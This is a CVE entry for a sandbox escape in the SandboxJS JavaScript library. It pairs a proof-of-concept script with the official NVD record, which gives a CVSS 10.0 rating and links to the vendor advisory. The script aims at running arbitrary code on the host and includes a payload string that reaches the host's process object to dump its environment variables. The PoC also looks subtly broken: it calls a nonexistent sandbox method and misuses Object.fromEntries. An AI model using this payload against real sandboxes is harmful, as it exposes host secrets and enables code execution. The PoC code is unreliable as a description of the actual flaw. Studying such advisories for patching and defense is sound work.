CVE-2026-26954

// CVE-2026-26954 SandboxJS Sandbox Escape PoC // This PoC demonstrates how to escape the SandboxJS sandbox // by leveraging Function objects and Object.fromEntries function escapeSandbox(sandbox) { // Step 1: Obtain an array containing Function // In vulnerable versions, arrays holding Function can be accessed const functionArray = sandbox.getFunctionArray(); // Step 2: Use Object.fromEntries to construct property access // The key insight is that {[p]: Function} creates an object // where p can be any constructible property const constructibleProp = 'constructor'; const exploitObject = Object.fromEntries({ [constructibleProp]: functionArray[0] // Function reference }); // Step 3: Access the global Function constructor const GlobalFunction = exploitObject.constructor; // Step 4: Execute arbitrary code outside the sandbox // This code runs in the host environment, not in the sandbox GlobalFunction('console.log("Sandbox escaped! Host code execution achieved.")')(); // Alternative: Direct code execution via Function constructor GlobalFunction('/* malicious code here */')(); } // Example of full exploitation const maliciousCode = ` // Read sensitive data from host environment const process = this.constructor.constructor('return process')(); console.log(process.env); `; // Defense: Upgrade to SandboxJS >= 0.8.34

{"cve": {"id": "CVE-2026-26954", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:31.143", "lastModified": "2026-03-17T20:13:06.470", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SandboxJS is a JavaScript sandboxing library. Prior to 0.8.34, it is possible to obtain arrays containing Function, which allows escaping the sandbox. Given an array containing Function, and Object.fromEntries, it is possible to construct {[p]: Function} where p is any constructible property. This vulnerability is fixed in 0.8.34."}, {"lang": "es", "value": "SandboxJS es una biblioteca de sandboxing de JavaScript. Antes de 0.8.34, es posible obtener arrays que contienen Function, lo que permite escapar del sandbox. Dado un array que contiene Function, y Object.fromEntries, es posible construir {[p]: Function} donde p es cualquier propiedad construible. Esta vulnerabilidad se corrige en la versión 0.8.34."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "baseScore": 10.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nyariv:sandboxjs:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.8.34", "matchCriteriaId": "21637BCD-7C1B-48F0-836C-399CD3946F7D"}]}]}], "references": [{"url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-6r9f-759j-hjgv", "source": "[email protected]", "tags": ["Vendor Advisory", "Exploit"]}, {"url": "https://github.com/nyariv/SandboxJS/security/advisories/GHSA-6r9f-759j-hjgv", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory", "Exploit"]}]}}